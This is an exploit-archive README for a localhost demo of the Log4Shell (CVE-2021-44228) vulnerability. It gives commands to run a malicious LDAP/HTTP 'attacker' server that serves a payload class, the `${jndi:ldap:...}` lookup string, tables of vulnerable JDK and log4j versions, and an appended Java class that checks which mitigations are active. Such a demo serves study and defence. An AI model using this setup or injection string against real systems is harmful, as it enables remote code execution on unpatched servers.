Source: https://sploitus.com/exploit?id=371D4A15-51B5-520B-B31D-856E557695FD
# sample-ldap-exploit
A short demo of CVE-2021-44228
## Build
~~~
$ mvn clean verify
~~~
## Run Attacker
~~~
$ java \
-cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
~~~
URLs:
- `http://localhost:8080/`
- `http://localhost:8080/sample/payload/Payload.class`
## Run Victim
~~~
$ java \
-cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
sample.victim.Victim
~~~
## Results
### JDK / JRE
| Version | Status |
|----------------------------------|----------------------------------------------------------------------------|
| `Oracle JDK 8u5` | vulnerable |
| `OpenJDK 8u312` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `IBM OpenJDK 8u312-b07 (OpenJ9)` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.7+10` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 11.0.13+8` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 16+36` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17+35` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
| `OpenJDK 17.0.1+12` | NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`) |
If NOT vulnerable, an instance of `javax.naming.Reference` is returned from `javax.naming.Context.lookup()`.
Even if the JDK is NOT vulnerable to loading classes from remote code bases,
other **Java deserialization vulnerabilities probably still exist**!
### log4j
| Version | Status |
|----------|-------------------------------------------------------------------------------------------------------------------|
| `2.9.1` | vulnerable |
| `2.10.0` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.14.1` | vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`) |
| `2.15.0` | NOT vulnerable |
If NOT vulnerable, `${jndi:ldap:...}` is NOT resolved.
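An added example, not part of this repository: a small Java class that reports which of the two mitigations from the tables above (the JDK `trustURLCodebase` property and the log4j `formatMsgNoLookups` property / environment variable) are in effect in the JVM it runs in. The class and enum names are my own; it assumes the values are interpreted as described in the tables.

```java
import java.util.HashMap;
import java.util.Map;

/**
 * Reports which of the two mitigations from the results tables are active in
 * the JVM this class runs in. Start it with the same -D flags and environment
 * as the application under review; only the in-process view is authoritative.
 */
public final class Log4ShellMitigationCheck {
    static final String TRUST_CODEBASE = "com.sun.jndi.ldap.object.trustURLCodebase";
    static final String NO_LOOKUPS_PROP = "log4j2.formatMsgNoLookups";
    static final String NO_LOOKUPS_ENV = "LOG4J_FORMAT_MSG_NO_LOOKUPS";

    public enum Verdict {
        LOOKUPS_DISABLED,     // ${jndi:...} is not resolved (2.10.0 / 2.14.1 honour the flag; 2.9.1 does not)
        REMOTE_LOAD_POSSIBLE, // trustURLCodebase=true: classes are loaded from the remote code base
        REMOTE_LOAD_BLOCKED,  // lookup() returns a javax.naming.Reference; deserialization risk remains
        JDK_DEFAULT_APPLIES   // flag unset: depends on the JDK build (table: Oracle JDK 8u5 vulnerable)
    }

    /** Both the JDK and log4j compare the value case-insensitively against "true". */
    static boolean isTrue(String value) {
        return "true".equalsIgnoreCase(value);
    }

    /** Pure function over an explicit property/environment view so it can be checked offline. */
    public static Verdict assess(Map<String, String> props, Map<String, String> env) {
        if (isTrue(props.get(NO_LOOKUPS_PROP)) || isTrue(env.get(NO_LOOKUPS_ENV))) {
            return Verdict.LOOKUPS_DISABLED; // the JNDI lookup never happens
        }
        String trust = props.get(TRUST_CODEBASE);
        if (trust == null) {
            return Verdict.JDK_DEFAULT_APPLIES;
        }
        return isTrue(trust) ? Verdict.REMOTE_LOAD_POSSIBLE : Verdict.REMOTE_LOAD_BLOCKED;
    }

    public static void main(String[] args) {
        Map<String, String> props = new HashMap<>();
        for (String name : System.getProperties().stringPropertyNames()) {
            props.put(name, System.getProperty(name));
        }
        System.out.println(props.get("java.vendor") + " " + props.get("java.version"));
        System.out.println(TRUST_CODEBASE + "=" + props.get(TRUST_CODEBASE));
        System.out.println(NO_LOOKUPS_PROP + "=" + props.get(NO_LOOKUPS_PROP)
                + ", " + NO_LOOKUPS_ENV + "=" + System.getenv(NO_LOOKUPS_ENV));
        System.out.println("verdict: " + assess(props, System.getenv()));
    }
}
```

The check sees only JVM state, not which log4j version is on the classpath, so read a `LOOKUPS_DISABLED` verdict together with the log4j table (the flag does nothing on 2.9.1).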